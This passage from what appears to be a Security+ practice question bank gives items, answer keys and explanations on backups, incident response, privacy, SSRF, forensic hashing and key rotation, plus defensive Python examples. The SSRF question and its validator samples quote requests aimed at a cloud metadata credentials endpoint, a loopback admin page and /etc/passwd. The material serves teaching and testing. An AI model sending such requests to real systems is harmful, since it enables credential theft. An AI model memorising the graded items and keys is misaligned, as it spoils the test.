Placing finance systems in a separate VLAN (Option A) segments the LAN into isolated broadcast domains, preventing general users from directly accessing finance workstations at Layer 2. This is a foundational step for network segmentation, as VLANs logically separate traffic without requiring physical re-cabling.

Exam trap

The trap here is that candidates often think VLANs alone provide security, forgetting that inter-VLAN routing is enabled by default on most switches, so ACLs or firewall rules are mandatory to actually restrict traffic between VLANs.

285
MCQ (hard)

Based on the exhibit, which change best moves the ERP recovery design toward meeting both recovery targets?

A.Increase the full backup frequency to every night and keep the same recovery process.
B.Add a warm standby database with 15-minute log shipping and scheduled failover tests.
C.Move backup media to the same server to reduce transfer time.
D.Eliminate differential backups and rely only on weekly full backups.
AnswerB

A warm standby reduces recovery time because the system is already provisioned and closer to operational readiness. Pairing it with 15-minute log shipping also improves the recovery point objective by limiting data loss. Scheduled failover tests validate that the process works in practice, which is critical when tight RTO and RPO targets must both be met.

Why this answer

Option B is correct because adding a warm standby database with 15-minute log shipping significantly reduces the recovery point objective (RPO) to near-zero and, combined with scheduled failover tests, ensures the recovery time objective (RTO) is met. This directly addresses the gap between the current backup-only approach and the required recovery targets, as log shipping provides near-continuous data protection and failover testing validates the recovery process.

Exam trap

The trap here is that candidates may think increasing backup frequency (Option A) is sufficient to meet recovery targets, but they overlook that backups alone do not reduce RTO and that a warm standby with log shipping is required for near-zero RPO and fast failover.

How to eliminate wrong answers

Option A is wrong because increasing full backup frequency to every night still leaves up to 24 hours of potential data loss, failing to meet a low RPO requirement, and does not improve recovery time. Option C is wrong because moving backup media to the same server eliminates off-site redundancy, increasing the risk of total data loss in a disaster, and does not reduce transfer time meaningfully if the network is the bottleneck. Option D is wrong because eliminating differential backups and relying only on weekly full backups increases both RPO (up to 7 days) and RTO (longer restore time), moving further from the recovery targets.

286
MCQ (easy)

A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?

A.Spyware that silently records user activity over time
B.Ransomware that encrypts files and demands payment for recovery
C.A worm that spreads mainly by scanning for other hosts
D.A rootkit that hides malicious processes from the operating system
AnswerB

Ransomware commonly encrypts a victim's files and displays a demand for payment to restore access.

Why this answer

The user's symptoms—unopenable files with strange extensions and a ransom note—are classic indicators of ransomware. Ransomware encrypts files using a symmetric key (e.g., AES-256) and then demands payment, typically in cryptocurrency, to provide the decryption key. This matches the scenario exactly, as the files are rendered inaccessible and a note is left behind.

Exam trap

The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the encryption of files and the presence of a ransom demand, which is unique to ransomware.

How to eliminate wrong answers

Option A is wrong because spyware focuses on covert data collection (e.g., keystroke logging, screen captures) and does not alter file extensions or display ransom notes; it operates silently to avoid detection. Option C is wrong because a worm self-replicates across networks by exploiting vulnerabilities (e.g., SMB EternalBlue) or scanning for open ports, but it does not specifically target user documents with encryption or leave a ransom note on the desktop.

287
MCQ (medium)

Several employees nearly entered credentials into a fake mailbox login page. The security team wants to reduce repeat mistakes quickly without overwhelming the whole company. What is the best communication approach?

A.Send a short targeted notice to the affected users with examples, warning signs, and reporting steps
B.Wait until the annual security training cycle to address the issue
C.Disable all external email until the next awareness campaign is completed
D.Send a company-wide message naming the affected employees to discourage mistakes
AnswerA

Targeted, timely communication is the best way to improve behavior quickly. A concise alert with screenshots or warning signs helps users recognize the specific threat they encountered, and clear reporting steps make it easier to respond correctly next time. This approach is practical, low disruption, and focused on the people most likely to benefit from immediate coaching.

Why this answer

A short targeted notice to the affected users is the best approach because it directly addresses the immediate threat without overwhelming the entire company. This method allows the security team to quickly reinforce specific warning signs (e.g., mismatched URLs, lack of HTTPS/TLS certificates) and reporting procedures, reducing the likelihood of repeat mistakes while maintaining operational efficiency.

Exam trap

The trap here is that candidates may choose a company-wide message (Option D) thinking it will deter others, but the SY0-701 exam emphasizes privacy and targeted remediation over public shaming or broad disruption.

How to eliminate wrong answers

Option B is wrong because waiting until the annual security training cycle would leave the vulnerability unaddressed for too long, allowing the same phishing attack to succeed repeatedly. Option C is wrong because disabling all external email is an overly drastic measure that would disrupt business operations and is not a targeted communication strategy. Option D is wrong because sending a company-wide message naming the affected employees would violate privacy and potentially cause embarrassment or retaliation, which is counterproductive to security culture and could discourage future reporting.

288
MCQ (easy)

A SIEM alert shows five failed logins to an administrator account, followed by a successful login from a new city three minutes later. The account owner says they did not sign in. What should the analyst do first?

A.Ignore the alert because the login eventually succeeded.
B.Temporarily disable the account and open an incident for investigation.
C.Reset the password only and close the alert.
D.Reboot the user's laptop to clear any malicious activity.
AnswerB

Disabling the account immediately limits further unauthorized access while the team investigates. Because the user denies the login and the activity is unusual, the account should be contained quickly and the event escalated for incident handling.

Why this answer

Option B is correct because the alert shows a classic indicator of account compromise: multiple failed logins followed by a successful authentication from an unusual location. The account owner's denial of the login confirms unauthorized access, so the immediate priority is to contain the threat by disabling the account and opening an incident for formal investigation. This aligns with the NIST SP 800-61 incident response process, specifically the containment phase before eradication or recovery.

Exam trap

The trap here is that candidates may focus on the 'successful login' as a resolution rather than recognizing it as the point of compromise, leading them to incorrectly choose A or C instead of prioritizing containment.

How to eliminate wrong answers

Option A is wrong because ignoring the alert ignores the clear evidence of a successful brute-force or credential-stuffing attack; the successful login from a new city indicates the attacker gained access, so the alert must be acted upon. Option C is wrong because resetting the password alone does not address the possibility that the attacker established persistence (e.g., a backdoor or session token) or that other accounts are compromised; closing the alert without investigation violates standard incident response procedures. Option D is wrong because rebooting the user's laptop does not remediate a server-side or cloud-based account compromise; the attacker likely authenticated from a remote system, not the local device, and rebooting would not remove any malicious activity on the server or directory service.

289
Multi-Select (hard)

A privileged cloud administrator account shows two suspicious events: an API key was created from an unfamiliar IP address, and a mailbox forwarding rule was added five minutes later. The account is still active and may be in attacker control. Which two actions should the analyst take first to preserve evidence while limiting additional abuse? Select two.

Select 2 answers
A.Export the relevant identity and audit logs before making changes, so the original event trail is preserved.
B.Revoke the suspicious API key or active session token, so the attacker loses immediate access.
C.Delete the mailbox forwarding rule and empty the trash folder, so the attacker cannot read old messages.
D.Reimage the admin workstation immediately, because the issue must have started on the endpoint.
E.Disable all company email for every user until the account investigation is finished.
AnswersA, B

Preserving the logs first protects the original evidence before any containment actions change the environment. Identity, audit, and mailbox logs can later prove who created the key, when the forwarding rule was added, and from where the activity originated. Exporting them early reduces the chance that the response itself destroys useful evidence.

Why this answer

Option A is correct because exporting identity and audit logs before any changes preserves the original event trail, which is critical for forensic analysis and chain of custody. If logs are altered or rotated after the fact, evidence of the attacker's actions (e.g., API key creation from an unfamiliar IP) could be lost or overwritten, hindering the investigation.

Exam trap

The trap here is that candidates may prioritize immediate disruption (e.g., deleting the forwarding rule or disabling email) over evidence preservation, forgetting that logs are the primary source of truth for incident response and that revoking access tokens (Option B) is the correct way to stop abuse without destroying evidence.

290
MCQ (medium)

A help desk team needs sample customer tickets in a lower environment for testing. The records contain names, phone numbers, and case details. Which approach best reduces privacy risk while still allowing useful testing?

A.Copy the production database exactly into the test system
B.Mask or tokenize the personal data before loading it into test
C.Email the records to developers so they can import them manually
D.Store the records in an unencrypted spreadsheet on a shared drive
AnswerB

Masking or tokenizing preserves usefulness for testing while reducing exposure of real personal information.

Why this answer

Option B is correct because data masking or tokenization replaces sensitive personal information (names, phone numbers) with realistic but fictitious values, preserving the dataset's utility for testing while minimizing exposure of real PII. This approach aligns with privacy best practices and regulatory requirements like GDPR or HIPAA, as the test environment never contains actual customer data.

Exam trap

The trap here is that candidates may choose Option A (exact copy) thinking it is the most efficient for testing, overlooking that privacy risk in a lower environment is a critical security concern that must be mitigated even at the cost of convenience.

How to eliminate wrong answers

Option A is wrong because copying the production database exactly into the test system exposes real PII (names, phone numbers, case details) in a lower environment that may lack production-level access controls, increasing the risk of data breach or non-compliance. Option C is wrong because emailing records containing PII to developers violates data protection principles (e.g., transmitting sensitive data over unencrypted channels) and introduces unnecessary distribution of personal data. Option D is wrong because storing records in an unencrypted spreadsheet on a shared drive provides no access control or encryption, leaving PII vulnerable to unauthorized access, theft, or accidental exposure.
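What "mask or tokenize before loading into test" looks like in practice is a small transformation step that runs in production, before the export. The following Python script is an added example and not part of the question bank; the ticket layout, the key, the customer records and the phone-number format are all constructed. Names become keyed HMAC tokens (so tickets for the same customer still correlate in the test system), phone numbers are masked in a format-preserving way, and free-text case details are scrubbed of the same identifiers:

```python
"""Mask and tokenize customer tickets before they leave production.

Added example, not part of the question bank. The ticket layout, the key
and the records below are constructed; a real pipeline keeps the key in a
secrets manager that the lower environment cannot read, otherwise testers
could recompute tokens and re-identify customers.
"""
import hashlib
import hmac
import json
import re

# Constructed key for this example only (see module docstring).
TOKEN_KEY = b"example-only-key-do-not-reuse"

# Constructed formats: NANP-style phone numbers and ordinary e-mail addresses.
PHONE_RE = re.compile(r"\b\d{3}-\d{3}-\d{4}\b")
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")


def _mac(value: str) -> bytes:
    """Keyed hash: deterministic for the same input, unguessable without the key."""
    return hmac.new(TOKEN_KEY, value.encode("utf-8"), hashlib.sha256).digest()


def tokenize_name(name: str) -> str:
    """Same customer -> same opaque token, so related tickets still join in test."""
    return "CUST-" + _mac(name.strip().lower()).hex()[:10].upper()


def mask_phone(phone: str) -> str:
    """Format-preserving mask: each digit becomes a keyed-pseudorandom digit, punctuation is kept.

    The 32-byte MAC covers up to 32 digits, more than any phone number needs.
    """
    stream = iter(_mac(phone))
    return "".join(str(next(stream) % 10) if ch.isdigit() else ch for ch in phone)


def scrub_details(text: str, name: str) -> str:
    """Free text repeats PII: swap the customer's name for its token, mask phones, drop e-mails."""
    text = re.sub(re.escape(name), tokenize_name(name), text, flags=re.IGNORECASE)
    text = PHONE_RE.sub(lambda m: mask_phone(m.group(0)), text)
    return EMAIL_RE.sub("redacted@example.invalid", text)


def mask_ticket(ticket: dict) -> dict:
    """Return a test-safe copy; non-identifying fields pass through unchanged."""
    return {
        "id": ticket["id"],
        "status": ticket["status"],
        "name": tokenize_name(ticket["name"]),
        "phone": mask_phone(ticket["phone"]),
        "details": scrub_details(ticket["details"], ticket["name"]),
    }


def mask_all(tickets: list) -> list:
    return [mask_ticket(t) for t in tickets]


# Constructed records; 555-01xx numbers are reserved for fictional use.
SAMPLE_TICKETS = [
    {"id": 1001, "status": "open", "name": "Jane Doe", "phone": "555-010-2345",
     "details": "Customer Jane Doe asked for a callback at 555-010-2345 (jane.doe@example.com)."},
    {"id": 1002, "status": "closed", "name": "jane doe", "phone": "555-010-2345",
     "details": "Follow-up: issue resolved."},
]

if __name__ == "__main__":
    print(json.dumps(mask_all(SAMPLE_TICKETS), indent=2))
```

Two design points matter for the exam concept. Tokenization here is one-way (a keyed hash, not encryption), so nothing in the test environment can recover the real name even if the token table is copied; and the free-text scrub only knows about the identifiers on the record itself, so other people named inside case details would need a dictionary or an entity-recognition pass before the export is considered clean.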

291
MCQ (medium)

A security analyst receives an alert about a user account that has been attempting to authenticate from an unusual geographic location outside of business hours. The analyst reviews the event logs and sees that the authentication attempt was successful, but the user has not reported any suspicious activity. Which of the following actions should the analyst take NEXT?

A.Disable the user account immediately to prevent further access
B.Contact the user to verify whether the authentication was legitimate
C.Continuously monitor the account for additional suspicious activity
D.Revoke all active sessions for the user account
AnswerB

Contacting the user is the appropriate next step in the incident response process. The analyst needs to confirm if the user performed the action. If the user denies it, the account is likely compromised, and the incident should be escalated. This step helps avoid false positives and ensures accurate incident handling.

Why this answer

The correct next step is to contact the user to verify whether the authentication was legitimate. Since the authentication was successful and the user has not reported suspicious activity, the analyst must first gather context from the user before taking any disruptive action. The verification should go through a channel the attacker cannot control, such as a phone number already on record or a direct conversation, not a reply to the mailbox or chat account that may itself be compromised. This aligns with the incident response process of validation and scoping before containment.

Exam trap

The trap here is that candidates often jump to containment (disabling the account) without first validating the alert, confusing the 'detection and analysis' phase with the 'containment, eradication, and recovery' phase of the incident response process.

How to eliminate wrong answers

Option A is wrong because immediately disabling the user account without verification could disrupt legitimate access and is premature; the analyst should first confirm the activity is unauthorized. Option C is wrong because continuous monitoring alone delays necessary action and does not address the immediate need to determine if the account is compromised; passive monitoring is insufficient when a successful authentication from an unusual location has already occurred. Option D is wrong for the same reason as A: revoking every active session is a containment action, and taken before verification it disrupts a possibly legitimate user while still not telling the analyst whether the login was authorized. If the user denies the login, A and D both become appropriate immediately afterward, together with a credential reset and escalation.

292
MCQhard

Based on the exhibit, which additional control is the best fit to prevent employees from copying sensitive reports to removable media?

A.Block all internet access on finance laptops except for the accounting website.
B.Implement endpoint device control or DLP rules to restrict removable media use.
C.Increase the password complexity requirements for finance users.
D.Add more antivirus signatures to the endpoint protection platform.
AnswerB

This is the best control because the incident involves data being copied to USB devices. Awareness and encryption do not stop a user from transferring files to removable media. Endpoint device control or DLP can block, log, or limit USB storage use, directly reducing the exfiltration path while preserving normal internet and email access.

Why this answer

Endpoint device control or DLP (Data Loss Prevention) rules are specifically designed to monitor, block, or restrict the use of removable media such as USB drives. By implementing such controls, an organization can enforce policies that prevent sensitive data from being copied to unauthorized external storage devices, directly addressing the threat of data exfiltration via removable media.

Exam trap

The trap here is that candidates often confuse network-based controls (like web filtering) with physical data exfiltration controls, or they mistakenly believe that stronger authentication or antivirus updates can prevent intentional data copying to removable media.

How to eliminate wrong answers

Option A is wrong because blocking all internet access except for the accounting website does not prevent copying data to removable media; it only restricts network-based data exfiltration, leaving the physical USB vector unaddressed. Option C is wrong because increasing password complexity requirements only strengthens authentication, but does not control what users do with data after they are authenticated, so it has no effect on copying files to removable media. Option D is wrong because adding more antivirus signatures improves detection of known malware but does not enforce policies on data transfer to removable media; it is a reactive security measure, not a preventive control for data loss.

293
Matchingeasy

Match each security principle to the best workplace example.

Matches

Least privilege: A help desk technician can reset passwords but cannot open payroll records.

Defense in depth: A customer portal uses MFA, endpoint protection, and network filtering together.

Zero trust (continuous verification): The system rechecks trust before each sensitive action, even from a managed device.

Separation of duties: One employee creates a payment batch and a different employee approves it.

Need to know: An analyst sees only the case files assigned to that investigation.

Why these pairings

Least privilege grants only the access a role requires, so the technician gets password resets but not payroll. Defense in depth layers independent controls so that one failing control (a phished password, say) does not by itself expose the portal. Zero trust re-verifies user, device, and context before each sensitive action instead of trusting a device because it is managed or because it authenticated earlier. Separation of duties splits creating and approving a payment between two people so that no single person can complete a fraudulent transaction alone. Need to know restricts access to the specific data a task requires, even among people with the same role or clearance, which is why the analyst sees only the assigned case files.

294
MCQmedium

A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?

A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB

SSRF tricks the server into making an internal request to a sensitive resource on the attacker’s behalf.

Why this answer

The attack is Server-Side Request Forgery (SSRF) because the cloud-hosted API is tricked into making a request to the instance metadata service at the link-local address 169.254.169.254. That address is reachable only from the instance itself (169.254.0.0/16 is not routed from the internet), so the attacker cannot query it directly and instead has the server fetch it; the response hands back the instance's temporary credentials, which the API dutifully returns to the user. SSRF exploits the server's ability to make outbound requests to internal or restricted resources. The application-side fix is to validate the destination after DNS resolution and reject link-local, loopback, and private ranges (or allowlist known image hosts); on AWS, requiring IMDSv2 is the provider-side control, because its session token must be obtained with a PUT request that a simple GET-based SSRF cannot issue.

Exam trap

The trap here is that candidates may confuse SSRF with CSRF because both involve 'forgery' and HTTP requests, but in SSRF the request is made by the server itself to a destination the attacker chooses, while in CSRF the request is made by a victim's browser that the attacker has induced to send it to a site where the victim is already authenticated.

How to eliminate wrong answers

Option A is wrong because Cross-Site Scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating server-side requests to internal IPs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unintended actions on a trusted site, not exploiting a server to fetch internal resources. Option D is wrong because SQL injection targets database queries through input fields, not HTTP requests to cloud metadata endpoints.
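As an added example (not part of the original question or of any real service's code), the following Python validates a user-supplied URL before a server-side fetch of the kind the thumbnail API performs. The function names and the sample URLs are constructed for illustration. The check resolves the host, unwraps IPv4-mapped IPv6 literals, and rejects anything that is not a globally routable unicast address, which is what would have stopped the `169.254.169.254` request in the scenario.

```python
"""Added example (not from the original question): reject SSRF targets
before an image-processing service fetches a user-supplied URL."""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """IP literals are parsed directly (no DNS, so this runs offline);
    hostnames go through getaddrinfo and every returned address is checked."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
        return [ipaddress.ip_address(info[4][0]) for info in infos]


def is_forbidden(addr):
    """True for anything that is not globally routable unicast: loopback,
    RFC 1918, link-local (the 169.254.169.254 metadata endpoint lives here),
    ULA, multicast, unspecified, reserved. IPv4-mapped IPv6 is unwrapped
    first so ::ffff:169.254.169.254 cannot slip past an IPv4-only check."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_multicast or not addr.is_global


def validate_fetch_url(url):
    """Return (ok, reason). Rejects non-http(s) schemes, empty hosts, and any
    host that resolves to a forbidden address."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolve_host(host)
    except (socket.gaierror, ValueError) as exc:
        return False, f"cannot resolve {host!r}: {exc}"
    for addr in addrs:
        if is_forbidden(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


def guarded_fetch(url, do_get):
    """Validate, then fetch. do_get(url) is the caller's HTTP client, injected
    so this example runs offline; it must not follow redirects on its own,
    because each Location target has to go through validate_fetch_url again."""
    ok, reason = validate_fetch_url(url)
    if not ok:
        raise PermissionError(f"refusing to fetch {url}: {reason}")
    return do_get(url)


if __name__ == "__main__":
    # Constructed inputs: the metadata URL from the question, a few variants
    # an attacker would try next, and one public-address URL that should pass.
    samples = [
        "http://169.254.169.254/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://127.0.0.1:8080/admin",
        "file:///etc/passwd",
        "http://93.184.216.34/photo.jpg",
    ]
    for s in samples:
        print(f"{s!r:55} -> {validate_fetch_url(s)}")
```

Two caveats a practitioner adds on top of this: connect to the address that was validated rather than resolving the name a second time inside the HTTP client (otherwise a DNS rebinding answer can swap in a link-local address between check and use), and keep automatic redirect following off so that every Location header is validated the same way.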

295
MCQmedium

An investigator has just created a bit-for-bit image of a suspect's SSD using a write blocker. Before the drive is returned to evidence storage, what action most directly validates the integrity of both the original media and the image?

A.Defragment the original SSD to make later analysis faster.
B.Calculate cryptographic hashes of the source and the image and record them.
C.Compress the image file to reduce storage usage before documentation.
D.Wipe free space on the original SSD to remove deleted remnants.
AnswerB

Matching hashes provide a repeatable integrity check that shows the image accurately reflects the acquired source without alteration.

Why this answer

Option B is correct because a cryptographic hash (SHA-256 in current practice; MD5 is still recorded by some tools for compatibility but is collision-prone and should never be the only value) acts as a fingerprint of the original SSD and of the forensic image. Hashing the write-blocked source, hashing the image, and finding the two values identical shows the bit-for-bit copy matches the source at the time of acquisition; recording those values lets anyone re-hash the image later and prove it has not changed, which is what admissibility turns on. This step directly validates that no data was altered or omitted during acquisition.

Exam trap

The trap here is that candidates may confuse integrity validation with storage optimization or cleanup tasks, mistakenly thinking defragmentation or compression helps preserve evidence, when in fact those operations write to the evidence or change the stored bytes. A hash does not prevent such changes; it is the recorded baseline that lets them be detected, so it has to be taken before anything else is done to either artefact.

How to eliminate wrong answers

Option A is wrong because defragmenting writes to the original SSD, altering the evidence and violating forensic best practice; on an SSD it is also pointless, since the flash translation layer rather than the logical layout decides where data is stored. It validates nothing. Option C is wrong because compression is a storage decision, not a validation step: compressing before the hashes are recorded leaves no baseline to compare against, and the hash of a compressed file will never equal the hash of the raw source. (Forensic container formats that compress, such as E01, store the hash of the uncompressed data stream, which still has to be computed and recorded.) Option D is wrong because wiping free space modifies the original drive, destroys deleted-file remnants that may be the very evidence sought, and invalidates any comparison with the image.
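The hashing step itself, as an added example (not from the original question): this Python computes SHA-256 and MD5 in a single chunked pass over each artefact, compares them, and produces the record that goes into the chain-of-custody log. Paths, case identifiers and the evidence bytes used in the demo are constructed for illustration; on a real acquisition the source is read through the write blocker and the image is the output file from the imaging tool.

```python
"""Added example (not from the original question): compute and compare
acquisition hashes for a source device and its bit-for-bit image."""
import hashlib
import io
from datetime import datetime, timezone

CHUNK_SIZE = 1 << 20  # 1 MiB reads keep memory flat for multi-terabyte images
ALGORITHMS = ("sha256", "md5")  # SHA-256 is the value that matters; MD5 only for legacy tooling


def hash_stream(stream, algorithms=ALGORITHMS):
    """Hash a binary stream in a single pass and return {algorithm: hexdigest}."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for block in iter(lambda: stream.read(CHUNK_SIZE), b""):
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_file(path, algorithms=ALGORITHMS):
    """Hash a device node or image file, e.g. /dev/sdb behind a write blocker."""
    with open(path, "rb") as fh:
        return hash_stream(fh, algorithms)


def hash_bytes(data, algorithms=ALGORITHMS):
    return hash_stream(io.BytesIO(data), algorithms)


def verification_record(source_hashes, image_hashes, case_id, examiner, note=""):
    """Build the entry that goes into the chain-of-custody log. 'verified'
    is True only when every algorithm agrees, so a single mismatch fails it."""
    verified = all(source_hashes[a] == image_hashes.get(a) for a in source_hashes)
    return {
        "case_id": case_id,
        "examiner": examiner,
        "recorded_at": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "source_hashes": source_hashes,
        "image_hashes": image_hashes,
        "verified": verified,
        "note": note,
    }


def verify_bytes(source, image, case_id="CASE-0000", examiner="examiner"):
    """Convenience wrapper for in-memory artefacts (used by the demo and tests)."""
    return verification_record(hash_bytes(source), hash_bytes(image), case_id, examiner)


def demo():
    # Constructed evidence: 8 KiB standing in for the SSD, plus two "images",
    # one exact copy and one with a single flipped bit.
    source = bytes(range(256)) * 32
    good_image = bytes(source)
    bad_image = source[:100] + bytes([source[100] ^ 0x01]) + source[101:]
    return verify_bytes(source, good_image), verify_bytes(source, bad_image)


if __name__ == "__main__":
    good, bad = demo()
    print("exact image verified:", good["verified"], good["image_hashes"]["sha256"][:16], "...")
    print("altered image verified:", bad["verified"])
```

Record the source hash first, while the drive is still behind the write blocker, then the image hash; re-hash the image before each later analysis session and compare against the logged value. On Linux the same digests can be produced with `sha256sum` and `md5sum` against the device node and the image file.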

296
Multi-Selecthard

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Select 3 answers
A.Restore a representative backup into an isolated test environment.
B.Run application and data validation checks on the restored system.
C.Measure the restore duration against the documented recovery objectives.
D.Increase the retention period without performing any restore.
E.Close the incident because the backup software reported a successful job completion.
AnswersA, B, C

A real restore test shows whether the backup can be recovered without risking production data.

Why this answer

Option A is correct because restoring a representative backup into an isolated test environment directly validates that the backup data is readable, the restore process works, and the system can be brought online without touching production or reintroducing the ransomware into it. Option B is correct because a restored system that boots is not necessarily usable: application and data validation checks (services start, databases open consistently, record counts or checksums match, the restored data predates the encryption event) confirm the restore is actually fit for use. Option C is correct because recoverability has a time dimension: timing the restore against the documented RTO, and comparing the backup's age against the RPO, shows whether the organization can meet its recovery objectives rather than merely that a restore is possible. A successful job completion log shows only that the backup was written, not that it can be read back and used.

Exam trap

The trap here is that candidates assume a successful backup job log is sufficient proof of recoverability, but CompTIA emphasizes that only a verified restore in a test environment can confirm the backup is usable, as backup software does not validate the restore process or data integrity.

297
Multi-Selecthard

A cloud backup service uses envelope encryption. The key-encryption key is nearing the end of its approved lifetime, but the business cannot decrypt and re-encrypt every backup object this week. Which two statements best describe the correct rotation approach? Select two.

Select 2 answers
A.Generate a new key-encryption key and use it for future backups.
B.Rewrap the existing data-encryption keys with the new key-encryption key.
C.Decrypt and re-encrypt every backup object immediately with a new data key.
D.Destroy the old key before the rewrapping process finishes.
E.Replace the hashing algorithm used for file integrity checks.
AnswersA, B

A new wrapping key can be introduced without changing the underlying encrypted backup data immediately.

Why this answer

Option A is correct because envelope encryption separates the key that protects each backup object (its data-encryption key, DEK) from the key that protects those DEKs (the key-encryption key, KEK), so the KEK can be rotated without touching the encrypted backup data. Generating a new KEK and using it for future backups ensures every new DEK is wrapped with the fresh key. Option B is correct because existing backups stay protected by rewrapping: each stored DEK is unwrapped with the old KEK and wrapped again with the new one, a small operation per object that never decrypts the backup data itself. Option D is the dangerous choice: the old KEK must remain available until every DEK has been rewrapped, otherwise those backups become unrecoverable. Option C is the brute-force approach the business has already ruled out, and Option E concerns integrity hashing, which is unrelated to key rotation.

Exam trap

The trap here is that candidates often assume key rotation requires re-encrypting all data, missing the core advantage of envelope encryption where only the key-encryption key needs to be rotated and DEKs can be rewrapped independently.
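The rotation flow the two correct answers describe, as an added example (not from the original question or any real backup product): a fresh KEK becomes the active wrapping key, every existing DEK is rewrapped, the backup ciphertext is never rewritten, and the old KEK cannot be retired while anything still references it. The `seal`/`unseal` pair here is an HMAC-SHA256 keystream with an HMAC tag, used as a standard-library stand-in for AES-GCM or a KMS wrap/unwrap call; the key store, object layout and key identifiers are constructed for illustration.

```python
"""Added example (not from the original question): envelope encryption with
KEK rotation by rewrapping DEKs. seal/unseal use an HMAC-SHA256 keystream and
HMAC tag as a stand-in for AES-GCM / KMS wrap; the rotation logic is the point."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

NONCE_LEN, TAG_LEN = 16, 32


def _subkey(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key, nonce, length):
    blocks = (length + 31) // 32
    return b"".join(
        hmac.new(enc_key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        for i in range(blocks)
    )[:length]


def seal(key, plaintext, aad=b""):
    """Encrypt-then-MAC. Returns nonce || ciphertext || tag."""
    enc_key, mac_key = _subkey(key, b"enc"), _subkey(key, b"mac")
    nonce = secrets.token_bytes(NONCE_LEN)
    ct = bytes(p ^ s for p, s in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key, blob, aad=b""):
    """Verifies the tag before decrypting; wrong key, wrong aad or a flipped bit all fail."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short")
    enc_key, mac_key = _subkey(key, b"enc"), _subkey(key, b"mac")
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, aad + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed")
    return bytes(c ^ s for c, s in zip(ct, _keystream(enc_key, nonce, len(ct))))


@dataclass
class BackupObject:
    object_id: str
    ciphertext: bytes   # data sealed under its own DEK; rotation never touches it
    wrapped_dek: bytes  # the DEK sealed under a KEK
    kek_id: str         # which KEK currently wraps the DEK


class KeyStore:
    """In-memory stand-in for a KMS holding KEK material by id."""

    def __init__(self):
        self.keks = {}
        self.active_kek_id = None

    def add_kek(self, kek_id):
        self.keks[kek_id] = secrets.token_bytes(32)
        self.active_kek_id = kek_id

    def store(self, object_id, data):
        """Fresh DEK per object; only the DEK is wrapped under the active KEK."""
        dek, aad = secrets.token_bytes(32), object_id.encode()
        return BackupObject(object_id, seal(dek, data, aad),
                            seal(self.keks[self.active_kek_id], dek, aad),
                            self.active_kek_id)

    def restore(self, obj):
        aad = obj.object_id.encode()
        dek = unseal(self.keks[obj.kek_id], obj.wrapped_dek, aad)
        return unseal(dek, obj.ciphertext, aad)

    def rotate_kek(self, new_kek_id, backups):
        """Answer A: new KEK for future backups. Answer B: rewrap every
        existing DEK. The backup ciphertext is never decrypted or rewritten."""
        self.add_kek(new_kek_id)
        for obj in backups:
            aad = obj.object_id.encode()
            dek = unseal(self.keks[obj.kek_id], obj.wrapped_dek, aad)
            obj.wrapped_dek = seal(self.keks[new_kek_id], dek, aad)
            obj.kek_id = new_kek_id

    def retire_kek(self, kek_id, backups):
        """Answer D is the trap: destroying a KEK that still wraps any DEK
        makes those backups unrecoverable, so refuse until rewrapping is done."""
        still_wrapped = [b.object_id for b in backups if b.kek_id == kek_id]
        if still_wrapped:
            raise RuntimeError(f"{kek_id} still wraps {still_wrapped}; rewrap first")
        del self.keks[kek_id]


if __name__ == "__main__":
    ks = KeyStore()
    ks.add_kek("kek-2024")
    backups = [ks.store("backup-1", b"payroll.tar"), ks.store("backup-2", b"db.dump")]
    ks.rotate_kek("kek-2025", backups)
    ks.retire_kek("kek-2024", backups)
    print([ks.restore(b) for b in backups], list(ks.keks))
```

Rewrapping touches one small blob per object and the KEK store, which is why it fits in a week when re-encrypting every backup object does not; with a real KMS the same loop is a series of unwrap/wrap (or re-encrypt) calls and the old key is scheduled for deletion only after the loop has completed for every object.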

298
Multi-Selecteasy

After a phishing simulation, many users still nearly entered credentials. Leadership wants to reduce repeat mistakes without causing long training sessions. Which two actions are the best balance of security and usability? Select two.

Select 2 answers
A.Send a short targeted refresher focused on the exact mistake
B.Add an easy reporting button inside the email client
C.Require every employee to attend a full-day annual course this week
D.Publicly post the names of employees who clicked the simulation
E.Disable all email attachments for every user
AnswersA, B

A brief, focused reminder addresses the observed behavior without taking people away from their normal work for long periods.

Why this answer

